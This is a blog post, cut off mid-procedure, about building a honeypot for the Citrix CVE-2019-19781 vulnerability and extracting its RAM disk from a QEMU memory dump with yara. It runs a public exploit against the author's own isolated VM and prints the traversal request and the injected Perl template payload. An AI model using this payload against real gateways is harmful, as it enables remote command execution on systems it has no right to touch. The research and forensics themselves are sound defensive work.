When I heard about the Citrix NetScaler vulnerability (CVE-2019-19781) I wanted to capture some exploits to see what they were doing. It turns out Citrix provide a downloadable version of Citrix Gateway (which was also vulnerable), but using it to capture exploits turned out to be trickier than I’d originally anticipated.
The Plan
Originally my plan was to build something that would recognise the incoming CVE-2019-19781 exploits (/vpns/… URLs) and return suitable replies to elicit a payload. When I went looking for more information on what NetScaler actually was, I found that I could download Citrix Gateway (formerly NetScaler Gateway/NetScaler Unified Gateway) from Citrix’s website. A quick check revealed that Citrix Gateway was also vulnerable, so I nabbed myself a copy.
I was a bit worried because the build number of my downloaded version was later than that listed in the vulnerability details, so I figured that Citrix had back-ported a fix and that consequently the version that I had wasn’t vulnerable.
Looking for details on the vulnerability got me some proof-of-concept code which I could use to check whether my downloaded version of Citrix Gateway was vulnerable. It would also be useful for testing any honeypot setup that I build.
So, with some potentially vulnerable software, and some proof-of-concept exploit code, I ran a test. It turns out that my downloaded version was still vulnerable (which was interesting given that this was just over a month since the vulnerability was announced), but it also demonstrated a problem.
I figured that I could just run the Citrix Gateway software as a virtual machine (which is how Citrix intended it to be used), plonk it on my honeynet, make sure that I had suitable logging and controls in place, and sit back and wait. My plan was to detect a compromise, shut the box down, create a new snapshot image, and start the box up again. That way I’ll end up with a collection of disk snapshots, each containing a different exploit attempt.
This proved to not be the case, however, as it turns out the Citrix Gateway software runs from a RAM disk. Consequently any exploits that hit it are lost when the box shuts down.
My next thought was to turn the RAM disk in to a persistent disk which I could then snapshot. I eventually (I also have a full time day job) managed to pull this off after learning about the UFS file system and how it is laid out on disk, and learning about FreeBSD kernel images with an embedded RAM disk image.
However, I then came up with an even ‘cooler’ (and possibly more compliant with Citrix’s end user license agreement), idea. Knowing that it is possible to dump the memory from a running QEMU virtual machine, what if I could dump the Citrix Gateway VMs memory and extract the RAM disk image from the memory dump? That will save me from having to mess around creating a persistent disk image, and also from modifying the original Citrix Gateway disk image.
Preparing the Honeypot
The plan is to create a QEMU virtual machine and use it to run the Citrix Gateway, which turned out to be FreeBSD running Citrix software. Conveniently, Citrix distribute ready-made virtual machine images for us to download (although you will need to create a Citrix account on their web site to do so).
Find and download a KVM (the virtualisation method used by QEMU) virtual machine image tarball from Citrix’s website (https://www.citrix.com/downloads/citrix-gateway/), and extract the contents somewhere environmentally friendly.
Before creating the virtual machine that will be used as the honeypot, we’ll need to create a virtual network in virt-manager for it. Create a virtual network with the following details:
Name: netscaler Mode: Isolated Enable IPv4: Yes Network: 192.168.100.0/24 Enable DHCPv4: No Enable IPv6: No DNS domain name: Use network name: Yes
We’ll also set up a new disk which will be a qcow2 image that uses the original Citrix supplied disk image as a backing file. That will mean that the original Citrix supplied disk image remains unchanged, and any writes to the disk will go to our new disk image. This will make it easier to go back to the original disk image should we want to.
[code autoformat=false] $ qemu-img create -b ./NSVPX-KVM-13.0-47.22_nc_64.qcow2 -f qcow2 nsvpx-kvm-disk1.qcow2 Formatting 'nsvpx-kvm-disk1.qcow2', fmt=qcow2 size=21474836480 backing_file=./NSVPX-KVM-13.0-47.22_nc_64.qcow2 cluster_size=65536 lazy_refcounts=off refcount_bits=16 [/code]
The downloadable KVM virtual machine image comes with an XML file (NSVPX-KVM.xml) that can be used with virsh(1) to create the virtual machine (‘domain’), however, we’ll need to edit the XML file a tad.
You’ll more than likely want to change the network configuration. I first changed mine to ‘Isolated’ so that it didn’t have Internet access, and was then able to test it with the proof-of-concept exploit code that I found. After confirming that it was vulnerable, I configured it on a honeypot host and gave it access to the honeynet, but as it turns out that was largely pointless (plus it’s a routine admin task) so I won’t go in to that. Edit the XML file (NSVPX-KVM.xml) with your favourite text editor:
Change the network interface type from ‘direct’ to ‘network’:
<interface type='network'>
Change the network interface device (the XML in the <interface> tag) from dev=’eth0′ mode=’bridge’ to the virtual network that we created above:
<source network='netscaler'/>
Now change the disk image (the XML in the <disk> tag) to be the newly created disk image, and also specify the full path to it:
<source file='/var/lib/libvirt/images/nsvpx-kvm-disk1.qcow2'/>
Now we should be able to create the virtual machine using the following command. Unless you changed the name of the virtual machine inside the XML file (the <name> tag), it will be called NetScaler-VPX:
[code autoformat='false'] $ virsh -c qemu:///system 'define NSVPX-KVM.xml' Domain NetScaler-VPX defined from NSVPX-KVM.xml [/code]
Smashing — you should now be able to start the virtual machine with the following command, although given that you’re going to want to log in to it, you may want to start it from virt-manager, although the VM image does have support for console on serial port so it is possible to login using the virsh console command, albeit with fewer messages as not everything seems to be sent to the serial port. You can use it to log in though.
[code autoformat='false'] $ virsh -c qemu:///system 'start NetScaler-VPX' Domain NetScaler-VPX started $ virsh -c qemu:///system 'console NetScaler-VPX' [/code]
Use CTRL-] to exit from the console (like exiting back to the telnet prompt for those of you old enough to have used telnet).
Now we have a Citrix Gateway box that we can log in to using the default credentials of nsroot/nsroot. Let’s try exploiting it.
Exploiting the Honeypot
Originally, I was going to build a vulnerable system and dangle it on the Internet and see what I got. However, when I was looking for information on the vulnerability, I stumbled across some exploit code on github (thanks @jas502n). This was good because it let me test that the version of Citrix Gateway that I had downloaded was indeed vulnerable.
As it turns out finding some exploit code was also advantageous because by the time I’d got all of this stuff built and ready to go, I was no longer seeing any exploits for this vulnerability in the wild! Consequently I’m using the exploit code that I downloaded to demonstrate what would have happened if I’d managed to get the honeypot up and running sooner.
I modified @jas502n’s code because it was trying to use a proxy at 127.0.0.1:8080, which I hadn’t bothered to set up (see notes later). I just removed the proxies by searching for and changing all occurrences of the following line:
proxies = {"http":"127.0.0.1:8080","https":"127.0.0.1:8080"}
to:
#proxies = {"http":"127.0.0.1:8080","https":"127.0.0.1:8080"}
proxies = {}
That is, commenting out the lines (it is set in two locations) that set the proxies dict to 127.0.0.1:8080 and instead setting proxies to an empty dict. Another option would be to remove the proxies=proxies argument from the requests.post() and requests.get() calls.
Once the NetScaler-VPX virtual machine is running, you should see a new network interface and a new network bridge on the host. Obviously the names may differ on your host, but if you are using libvirt and qemu/kvm then the naming convention should be the same and it will more than likely only differ by the digit(s) on the end:
[code autoformat=false] # show the network interface $ ip link show vnet0 12: vnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr2 state UNKNOWN mode DEFAULT group default qlen 1000 link/ether fe:54:00:29:74:b3 brd ff:ff:ff:ff:ff:ff # show the bridge $ /sbin/brctl show virbr2 bridge name bridge id STP enabled interfaces virbr2 8000.5254006a638e yes virbr2-nic vnet0 [/code]
The Citrix Gateway box will set itself up with an IPv4 address of 192.168.100.1/16 by default, which is why we set the virtual network up to be 192.168.0.0/16.
[code autoformat=false] $ virsh -c qemu:///system 'console NetScaler-VPX' Connected to domain NetScaler-VPX Escape character is ^] login: nsroot Password: Copyright (c) 1992-2013 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. Done > shell Copyright (c) 1992-2013 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. root@ns# ifconfig 0/1: flags=8843 metric 0 mtu 1500 options=800b9 ether 52:54:00:29:74:b3 inet 192.168.100.1 netmask 0xffff0000 broadcast 192.168.255.255 inet6 fe80::5054:ff:fe29:74b3%0/1 prefixlen 64 autoconf scopeid 0x2 nd6 options=3 [...] root@ns# [/code]
Now, since libvirt/kvm created a local bridge interface on the (hypervisor) host for the netscaler virtual network (virbr2), we should be able to reach the Citrix Gateway box directly from the hypervisor host (that is, the host running the virtual machine):
[code autoformat=false] $ ssh nsroot@192.168.100.1 The authenticity of host '192.168.100.1 (192.168.100.1)' can't be established. RSA key fingerprint is SHA256:BJDg92vak+mPiHegwdQsGRv6YWuCVSdWZvHCZBgl/aE. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.100.1' (RSA) to the list of known hosts. # # WARNING: Access to this system is for authorized users only Disconnect IMMEDIATELY if you are not an authorized user! # # Password: Done > shell Copyright (c) 1992-2013 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. root@ns# [/code]
Et voila. Of course, the security conscious thing to do (to check that your connection isn’t affected by a man-in-the-middle attack) would be to log in to the host on console (rather than with ssh) and run ssh-keygen -l -f /nsconfig/ssh/ssh_host_rsa_key.pub and confirm that the fingerprint matches that presented by the ssh command, before accepting the key and logging in.
Should you want to check the host key (and you should) using the above command, the host key file can be found in /etc/sshd_config (HostKey /nsconfig/ssh/ssh_host_rsa_key), the path of which shows up in the sshd command line (-f option) and can be found by running ps aux | grep [s]shd.
Now that we know that we can reach the box and log in, let’s throw an exploit at it:
$ python ./CVE-2019-19781.py http://192.168.100.1/ [ASCII art that doesn't at all work in WordPress] Remote Code Execute in Citrix Application Delivery Controller and Citrix GatewayUsage: python CVE-2019-19781.py http://x.x.x.x/
Python By Jas502n
Set Cmd > ls -l [+] Upload_Xml= http://192.168.100.1//vpn/../vpns/portal/scripts/newbm.pl [+] Upload successful! [+] Xml_Url= http://192.168.100.1//vpn/../vpns/portal/f9a7585e.xml [+] Command= ls -l [+] Exec Result: total 73 drwxr-xr-x 2 root wheel 1024 Nov 28 19:29 bin lrwxr-xr-x 1 root wheel 33 Mar 6 00:02 colorful -> /netscaler/portal/themes/colorful drwxr-xr-x 3 root wheel 512 Nov 28 19:45 compat lrwxr-xr-x 1 root wheel 15 Mar 6 00:02 configdb -> /flash/configdb dr-xr-xr-x 8 root wheel 512 Mar 6 00:02 dev drwxr-xr-x 8 root wheel 1536 Mar 6 00:02 etc drwxr-xr-x 6 root wheel 512 Mar 4 09:50 flash drwxr-xr-x 2 root wheel 512 Nov 28 19:29 home drwxr-xr-x 3 root wheel 2048 Nov 28 19:45 lib drwxr-xr-x 2 root wheel 512 Nov 28 19:42 libexec drwxr-xr-x 2 root wheel 512 Nov 28 19:29 mnt drwxr-xr-x 16 root wheel 5632 Nov 28 19:59 netscaler drwxr-xr-x 260 root wheel 3584 Mar 6 00:02 nscache lrwxr-xr-x 1 root wheel 16 Mar 6 00:02 nsconfig -> /flash/nsconfig/ lrwxr-xr-x 1 root wheel 33 Mar 6 00:02 optional -> /netscaler/portal/themes/optional dr-xr-xr-x 1 root wheel 0 Mar 6 00:47 proc drwxr-xr-x 2 root wheel 512 Mar 6 00:19 root drwxr-xr-x 2 root wheel 2048 Nov 28 19:29 sbin drwxrwxrwt 3 root wheel 1024 Mar 6 00:18 tmp drwxr-xr-x 10 root wheel 512 Nov 28 19:45 usr drwxr-xr-x 38 root wheel 1024 Mar 4 09:51 var Set Cmd >
Nice. So what did it do? CVE-2019-19781.py issued a HTTP POST request to http://192.168.100.1//vpn/../vpns/portal/scripts/newbm.pl with specific content (a ‘specially crafted request’ as it were) which caused the Citrix Gateway software to create a file /netscaler/portal/templates/f9a7585e.xml (note that the file name is ‘randomised’ for each request).
Not only could that be a security risk in itself (depending on where files can be written to), but the contents of the created file, when requested by the web server, cause the web server running on the Gateway to execute the shell command that we entered at CVE-2019-19781.py’s ‘Set Cmd >’ prompt:
root@ns# cd /netscaler/portal/templates root@ns# ls -lart total 168 -r--r--r-- 1 nobody wheel 4637 Nov 28 19:45 styles.css -r--r--r-- 1 nobody wheel 1991 Nov 28 19:45 wrapper.tmpl -r--r--r-- 1 nobody wheel 863 Nov 28 19:45 tips.html -r--r--r-- 1 nobody wheel 7012 Nov 28 19:45 themes.html -r--r--r-- 1 nobody wheel 4404 Nov 28 19:45 rmft.html -r--r--r-- 1 nobody wheel 4398 Nov 28 19:45 rmbm.html -r--r--r-- 1 nobody wheel 326 Nov 28 19:45 resources.tmpl -r--r--r-- 1 nobody wheel 216 Nov 28 19:45 preferences.html -r--r--r-- 1 nobody wheel 1340 Nov 28 19:45 ping.html -r--r--r-- 1 nobody wheel 9063 Nov 28 19:45 newbm.html -r--r--r-- 1 nobody wheel 1496 Nov 28 19:45 navwrapper.tmpl -r--r--r-- 1 nobody wheel 7015 Nov 28 19:45 navthemes.html -r--r--r-- 1 nobody wheel 167 Nov 28 19:45 missing.html -r--r--r-- 1 nobody wheel 1496 Nov 28 19:45 menu.tmpl -r--r--r-- 1 nobody wheel 82 Nov 28 19:45 loadresources.tmpl -r--r--r-- 1 nobody wheel 489 Nov 28 19:45 j_services.html -r--r--r-- 1 nobody wheel 22646 Nov 28 19:45 homepage2.html -r--r--r-- 1 nobody wheel 28918 Nov 28 19:45 homepage.html -r--r--r-- 1 nobody wheel 0 Nov 28 19:45 globalFS.tmpl -r--r--r-- 1 nobody wheel 0 Nov 28 19:45 globalBK.tmpl -r--r--r-- 1 nobody wheel 4078 Nov 28 19:45 ftlist.html -r--r--r-- 1 nobody wheel 368 Nov 28 19:45 filetransfer.html -r--r--r-- 1 nobody wheel 876 Nov 28 19:45 f_services.html -r--r--r-- 1 nobody wheel 503 Nov 28 19:45 error.html -r--r--r-- 1 nobody wheel 743 Nov 28 19:45 err2006.html -r--r--r-- 1 nobody wheel 754 Nov 28 19:45 err2005.html -r--r--r-- 1 nobody wheel 711 Nov 28 19:45 err2004.html -r--r--r-- 1 nobody wheel 764 Nov 28 19:45 err2002.html -r--r--r-- 1 nobody wheel 3111 Nov 28 19:45 chpwdsuccess.html -r--r--r-- 1 nobody wheel 10325 Nov 28 19:45 changepwd.html -r--r--r-- 1 nobody wheel 6712 Nov 28 19:45 bookmark.html -r-xr-xr-x 1 nobody wheel 159 Nov 28 19:45 boilerplate.tmpl drwxr-xr-x 10 nobody wheel 512 Nov 28 19:45 .. -rw-r--r-- 1 nobody wheel 333 Mar 6 00:47 f9a7585e.xml drwxr-xr-x 2 nobody wheel 1024 Mar 6 00:47 .
The f9a7585e.xml XML file that the exploit created, contains the following:
<?xml version="1.0" encoding="UTF-8"?>
<user username="../../../netscaler/portal/templates/f9a7585e">
<bookmarks>
<bookmark UI_inuse="" descr="[% template.new('BLOCK' = 'print `ls -l`') %]" title="f9a7585e" url="http://example.com" />
</bookmarks>
<escbk>
</escbk>
<filesystems></filesystems>
<style></style>
</user>
There are two things of note here — the path in the username attribute of the user tag; and the ls -l command in the Perl code in the bookmark tag’s descr attribute.
The path in the username attribute seems to correspond with the location and file name of the XML file, and the ls -l command in the descr attribute is enclosed in back-tick (`) characters and looks like an attempt to get Perl to execute the contents (similarly to how back-ticks are used in the UNIX Bourne and Bash shells). It is also the command that we gave to the exploit script, and the output from the exploit script suggests that the ls -l command did in fact execute.
We can change the exploit script and explicitly set the username attribute to something known, like the string usernamefilename and use that to find where the file would normally be written. To do this, find the headers dict in the upload_xml() function, and change “NSC_USER”: “../../../netscaler/portal/templates/%s”%cdl to “NSC_USER”: “usernamefilename”.
If we then run the exploit again, we can find where the Citrix Gateway web server would usually create the XML files:
[code autolinks='false'] root@ns# find / -name usernamefilename* -ls 848237 4 -rw-r--r-- 1 nobody wheel 306 Mar 6 03:00 /var/vpn/bookmark/usernamefilename.xml [/code]
That tells us two things — that the contents of the username attribute is indeed used as the file name, and that the XML files are normally written to the /var/vpn/bookmark/ directory.
The reason the exploit has to use directory traversal (‘..’) and specify an alternative path is because the XML file needs to be accessible by the web server, and interpreted as a template, so it needs to be under DocumentRoot or ScriptDir, or somewhere else that the web server will think of looking for it. Hence the directory traversal attack (which is now a very old security vulnerability and really shouldn’t exist in this day and age) is used to place the file in the templates/ directory.
Now, this is where we notice a problem. Exploiting this vulnerability results in a file being placed in the /netscaler/portal/templates/ directory, but if we list mounted file systems we can see that the /netscaler/portal/templates/ directory is actually on the root (/) file system, and that the root file system is mounted from /dev/md0 which is a RAM disk. The disk devices are named after the type of disk, in this case md, and the digits specify an instance, so md0 represents the first (0) RAM disk (md). Similarly, vtbd0 is the first (0) virtio disk (vtbd) — the virtual disk attached to the virtual machine:
[code autolinks='false'] root@ns# mount /dev/md0 on / (ufs, local) devfs on /dev (devfs, local, multilabel) procfs on /proc (procfs, local) /dev/vtbd0s1a on /flash (ufs, local, soft-updates) /dev/vtbd0s1e on /var (ufs, local, soft-updates) [/code]
This poses a problem. Once our Citrix Gateway honeypot is successfully attacked, we’d ideally want to shut it down, create a new disk image (this is why it is handy to create a new disk image using the original Citrix disk image as the backing file), and start the honeypot virtual machine up again. However, if the exploits are being written to the /netscaler/portal/templates/ directory, and that directory is on a RAM disk, we are going to lose those exploit files when we shut the virtual machine down.
After a reasonable amount of jiggery pokery, I managed to extract the RAM disk image from the kernel file, convert it to a physical disk image, and then tweak the resulting installation to use the new setup. This, however, meant modifying the original image.
A neater (not to mention ‘cooler’) approach would be to pull the exploit files from the RAM disk image sitting in the memory of the virtual machine — ‘Hey Rocky — watch me pull a rabbit out of my hat!’.
Finding the RAM Disk Image
The first step in finding the RAM disk image is to actually access the memory of the virtual machine. We have a couple of options here. We could access the kernel debugger over a serial port, and if our honeypot was a physical host we’d have to use this option; or we could take advantage of the honeypot being a virtual machine and ask the hypervisor to dump the virtual machine’s memory to a file. Needless to say, the second option is somewhat easier.
Let’s dump the memory of our QEUM/KVM Citrix Gateway honeypot:
[code autolinks='false'] $ virsh -c qemu:///system 'dump NetScaler-VPX /var/tmp/NetScaler-VPX.dump --memory-only' $ ls -la /var/tmp/NetScaler-VPX.dump -rw------- 1 root root 2151811000 Mar 6 12:35 /var/tmp/NetScaler-VPX.dump # it would be a good idea to chown(1) the core file at # this point so you don't have to run commands as 'root', # especially commands that are parsing data and prone to # parsing errors/exploits (printf(3) and format string # vulnerabilities spring to mind) $ chown user /var/tmp/NetScaler-VPX.dump $ file /var/tmp/NetScaler-VPX.dump /var/tmp/NetScaler-VPX.dump: ELF 64-bit LSB core file, x86-64, version 1 (SYSV), SVR4-style [/code]
So that has given us an ELF core file, which is the default format. Now, I’m going to take the ‘brute force and ignorance’ approach which will save me from having to look up the format of ELF core files and track the RAM disk image down properly (I tried using Volatility, but it didn’t have a profile for FreeBSD — only for Windows and Linux).
The brute force approach simply involves searching for the UFS file system magic number in the core file. Having said ‘simply’, it isn’t quite that simple. The UFS magic number will appear a number of times. It will appear in the mounted RAM disk image (which is the one that we’re interested in), but it will also appear in the RAM disk image that is embedded in the kernel image, and it will also appear in code that needs to parse the UFS superblock — namely UFS file system code. Hence it is likely to be in the kernel, boot code, and file system commands such as mkfs and fsck.
Let’s have a look at that ELF core file with readelf and see what it tells us about it:
$ readelf -a /var/tmp/NetScaler-VPX.dump ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: CORE (Core file) Machine: ... Version: 0x1 Entry point address: 0x0 Start of program headers: 64 (bytes into file) Start of section headers: 0 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 5 Size of section headers: 0 (bytes) Number of section headers: 0 Section header string table index: 0 There are no sections in this file. There are no sections to group in this file. Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align NOTE 0x0000000000000158 0x0000000000000000 0x0000000000000000 0x0000000000000660 0x0000000000000660 0x0 LOAD 0x00000000000007b8 0x0000000000000000 0x0000000000000000 0x00000000000a0000 0x00000000000a0000 0x0 LOAD 0x00000000000a07b8 0x00000000000c0000 0x00000000000c0000 0x000000007ff40000 0x000000007ff40000 0x0 LOAD 0x000000007ffe07b8 0x00000000fc000000 0x00000000fc000000 0x0000000000400000 0x0000000000400000 0x0 LOAD 0x00000000803e07b8 0x00000000fffc0000 0x00000000fffc0000 0x0000000000040000 0x0000000000040000 0x0 There is no dynamic section in this file. There are no relocations in this file. The decoding of unwind sections for machine type ... is not currently supported. Dynamic symbol information is not available for displaying symbols. No version information found in this file. Displaying notes found at file offset 0x00000158 with length 0x00000660: Owner Data size Description CORE 0x00000150 NT_PRSTATUS (prstatus structure) CORE 0x00000150 NT_PRSTATUS (prstatus structure) QEMU 0x000001b8 Unknown note type: (0x00000000) description data: [ hex bytes ] QEMU 0x000001b8 Unknown note type: (0x00000000) description data: [ hex bytes ]
Right. Let’s have a look and see what that is telling us. The most useful information is in the LOAD program headers, as those headers tell us the allocated blocks of physical memory, and where they are in the core file.
So, what that ‘Program Headers’ output is telling us, is that there are four blocks of memory (identified by the LOAD headers) in the core file:
Phyiscal address (PhysAddr) | Size (MemSiz) | File offset (Offset) |
0x0000000000000000 | 0x00000000000a0000 | 0x00000000000007b8 |
0x00000000000c0000 | 0x000000007ff40000 | 0x00000000000a07b8 |
0x00000000fc000000 | 0x0000000000400000 | 0x000000007ffe07b8 |
0x00000000fffc0000 | 0x0000000000040000 | 0x00000000803e07b8 |
That first block is 0xa0000 (655360) bytes, and is the 640KB ought to be enough for anyone block of real/conventional memory. That is, it is the usable part of the lower 1MB of address space that can be addressed with the processor running in real mode (as opposed to in protected mode).
Notice, however, that the second block starts at address 0xc0000, which leaves a gap after the first block. This is because the 384KB between 640KB and 1MB is reserved for hardware ROMs such as those found on video and network adapters. This means that there isn’t necessarily any memory at those addresses. If you run the dmesg(1) command on the NetScaler VM you can see this area being used:
orm0: at iomem 0xc0000-0xc97ff,0xea000-0xeffff on isa0 ... vga0: at port 0x3c0-0x3df iomem 0xa0000-0xbffff on isa0
That output shows display memory at 0xa0000 – 0xbffff — not sure why that wasn’t included in the core file, but it’s irrelevant for what we’re trying to do so I’m not going to dwell on it. You can see that the NetScaler kernel (FreeBSD) has detected option ROM mapped between 0xc0000 – 0xc97ff and between 0xea000 – 0xeffff. 0xf0000 – 0x100000 (being 1MB) will be the 64KB system BIOS ROM.
That second memory block is 0x7ff40000 bytes, which is 0x80000000 – 0xc0000. That is, it is 2GB minus the first 768KB of memory (the 640KB of conventional RAM which is in the first block of memory, and the 128KB gap in the option ROM region). The second block starts with the display (VGA) memory at address 0xa0000 (768KB).
The third and the fourth blocks, I don’t want to miss. These two blocks baffled me for a bit, starting at 0xfc000000 and 0xfffc0000, because these addresses are above the 2GB of memory assigned to the virtual machine. After doing some hunting I found an osdev web page documenting the memory layout on x86 machines, which explains that the memory area between 0xc0000000 and 0xffffffff is typically reserved for memory mapped devices.
Back to our little RAM disk. This is where a little knowledge of UFS file systems comes in handy. After searching for information on the UFS file system magic number and superblock layout and not getting very far, I eventually found a web page giving me the information that I was after. The web page showed an excerpt from a book: File System Forensic Analysis, by Brian Carrier (@carrier4n6)– thanks Brian. When I saw it, I recognised the title — I had two copies on my bookshelf (one I’d actually purchased as part of a box set of three forensics books, and the other I received on the SANS forensics course)!
We can cheat a bit here because we have root access to the running system, so we can actually dump the first few blocks of the RAM disk device and see what it looks like. That will then help us find it in the memory dump:
[code autolinks='fase'] root@ns# dd if=/dev/md0 of=/var/tmp/md0 bs=512 count=132 16+0 records in 16+0 records out 65536 bytes transferred in 0.002063 secs (31766775 bytes/sec) root@ns# file /var/tmp/md0 md0: Unix Fast File system [v2] last mounted on /, last written at Mon Mar 9 00:59:22 2020, clean flag 0, readonly flag 0, number of blocks 218112, number of data blocks 211159, number of cylinder groups 4, block size 16384, fragment size 2048, average file size 16384, average number of files in dir 64, pending blocks to free 0, pending inodes to free 0, system-wide uuid 0, minimum percentage of free blocks 2, SPACE optimization [/code]
Smashing. Now that file(1) output tells us that the RAM disk contains a UFS v2 file system. If we consult File System Forensic Analysis, chapter 17: UFS1 and UFS2 Data Structures tells us that the UFS2 superblock is typically located in sector 128, and then lists the fields typically used by FreeBSD and OpenBSD. It also tells us that we need the first 1,376 bytes of the superblock to capture the UFS2 magic number. This is why I used bs=512 and count=132 on the dd(1) command above — it was to make sure that I captured the UFS2 superblock, up to and including the UFS2 magic number at least (count=128 would read up to the start of the superblock in sector 128, we then need at least 3 blocks to capture the 1,376 bytes of superblock, and 3 is a funny number in IT so I rounded it up to 4, being a power of 2).
Right. So the superblock is in sector 128, and the UFS2 magic number is at offset 1,372 – 1,375 (four bytes) in the superblock. This means we should be able to see the UFS2 magic number (0x19540119 — big endian) at offset 128 * 512 + 1372, which is 66,908, or 0x1055c:
[code autolinks='false'] # Start dumping in 'canonical' form (-C), which is an easy # way of getting single byte output # and start at offset 0x10550 (-s 0x10550) root@ns# hexdump -Cs 0x10550 /var/tmp/md0 00010550 00 00 00 00 00 00 00 00 00 00 00 00 19 01 54 19 |…………..T.| 00010560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |…………….| * 00010800 [/code]
… and we do — note that the magic number is in little-endian format (that is, backwards) in the RAM disk image.
File System Forensic Analysis, chapter 16: UFS1 and UFS2 Concepts and Analysis tells us that a UFS file system is laid out on disk as follows:
Sector(s) | Byte offset (hex / decimal) | Description |
0 | 0x000000 / 0 | Boot code 1 |
1 | 0x000200 / 512 | BSD disk label |
2 – 15..127 | 0x000400 / 1,024 | Boot code 2 |
128 | 0x010000 / 65,536 | Superblock |
Let’s have a look at the actual data so we can come up with something to search for in the memory dump.
[code autolinks='false'] root@ns# hexdump -C /var/tmp/md0 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |…………….| * 00000200 57 45 56 82 00 00 00 00 61 6d 6e 65 73 69 61 63 |WEV…..amnesiac| 00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |…………….| 00000220 00 00 00 00 00 00 00 00 00 02 00 00 3f 00 00 00 |…………?…| 00000230 10 00 00 00 61 03 00 00 f0 03 00 00 00 50 0d 00 |….a……..P..| 00000240 00 00 00 00 00 00 00 00 10 0e 01 00 00 00 00 00 |…………….| 00000250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |…………….| * 00000280 00 00 00 00 57 45 56 82 57 61 08 00 00 20 00 00 |….WEV.Wa… ..| 00000290 00 00 00 00 f0 4f 0d 00 10 00 00 00 00 00 00 00 |…..O……….| 000002a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |…………….| 000002b0 00 00 00 00 00 50 0d 00 00 00 00 00 00 00 00 00 |…..P……….| 000002c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |…………….| * 00010000 00 00 00 00 00 00 00 00 28 00 00 00 30 00 00 00 |……..(…0…| [/code]
We can see from that that the first sector (first block of boot code) is all 0x00 bytes, which is understandable because there’s no point putting boot code on a RAM disk, for obvious reasons.
Now the second sector (sector 1) at offset 0x0200 is the BSD disk label. That has what looks like a label (amnesiac) of some description in it. So we need to look through the memory dump for 512 zero bytes, then the BSD disk label which begins with ‘WEV\x82’ followed by four zero bytes and the string ‘amnesiac’, then (128 * 512 + 1372 – (512 + 16)) == 66,380 bytes followed by the UFS2 magic number. Let me explain that calculation:
128 * 512 skips the first 128 sectors which gets us to the start of the UFS2 superblock.
+1372 bytes offset of the UFS2 magic number into the superblock
– (512 + 16) bytes being the 512 bytes of sector 0 plus the first 16 bytes of sector 1 which gets us to the end of the ‘amnesiac’ label. We subtract this because we are calculating the number of bytes after the ‘amnesiac’ label and before the UFS2 magic number.
Now you could just load the core file into a hex editor such as bvi, and use it to search for all the occurrences of the UFS magic number, or the ‘amnesiac’ label, or you can take the I’ve-been-working-in-IT-too-long-and-am-sick-of-doing-things-manually approach, which also has the advantage of being scriptable. There is a useful tool for searching for patterns of bytes in files, and that’s yara. Let’s create a yara rule.
rule ufs2_filesystem {
strings:
$ufs2filesystem = { 57 45 56 82 00 00 00 00 61 6d 6e 65 73 69 61 63 [66380] 19 01 54 19 }
condition:
$ufs2filesystem
}
Yara checks for the conditions. In this case, the condition consists of a single variable, being a string to search for. That causes the rule to match if that string is found in any of the input files.
The string, in this case, is a sequence of hex bytes which represent ‘WEV\x82\x00\x00\x00\x00amnesiac’ followed by what yara calls a ‘jump’. The jump tells yara to skip a number of bytes, in this case 66,380 bytes (being the gap that we calculated above, between the end of the ‘amnesiac’ label and the start of the UFS2 file system magic number). The last four hex bytes of the string are the UFS2 file system magic number, in little-endian (least significant byte first) byte order.
If we now run that yara rule on our memory dump file, we very nicely get a single match. The -s option tells yara to output the offset of any strings that are found (which is why I coded the rule using one long string rather than how I did it originally, which was by using a few separate strings combined in the condition section of the rule):
[code autolinks='false'] $ yara -s ufs.yara /var/tmp/NetScaler-VPX.dump ufs2_filesystem /var/tmp/NetScaler-VPX.dump 0x15a0d28:$ufs2filesystem: 57 45 56 82 00 00 00 00 61 6D 6E 65 73 69 61 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 … [/code]
We could have tried to make the rule more efficient by removing the jump, and hence we’d also have to remove the UFS2 file system magic number. If we do that though, we get multiple matches, which we’d then have to wade through manually, and if we’re going to script this then we’ll need to be able to script the extra checking that needs to be done:
[code autolinks='false'] $ yara -s ufsshort.yara /var/tmp/NetScaler-VPX.dump ufs2_filesystem /var/tmp/NetScaler-VPX.dump 0x15a0d28:$ufs2filesystem: 57 45 56 82 00 00 00 00 61 6D 6E 65 73 69 61 63 0x1e5249b8:$ufs2filesystem: 57 45 56 82 00 00 00 00 61 6D 6E 65 73 69 61 63 0x1e5269b8:$ufs2filesystem: 57 45 56 82 00 00 00 00 61 6D 6E 65 73 69 61 63 0x1e5289b8:$ufs2filesystem: 57 45 56 82 00 00 00 00 61 6D 6E 65 73 69 61 63 [/code]
Right. So back to the longer yara rule, which tells us that it has found something, at offset 0x15a0d28 in the memory dump file, that matches the start of our RAM disk image. Now we still have a little work to do. Remember how the ‘WEV\x82’ was at the start of sector 1, not at the start of the RAM disk image? We need to subtract 512 (0x200) bytes from that offset to get the start of what will hopefully be our RAM disk image in the memory dump. Note that you need to capitalise the letters in hex digits for the bc(1) command:
[code autolinks='false'] $ bc ... ibase=16 15A0D28 - 200 22678312 [/code]
Now, the moment of truth — do we have a valid RAM disk image at that location in the memory dump file? Linux has a nifty way of letting you mount file systems in the middle of files, so let’s give it a go:
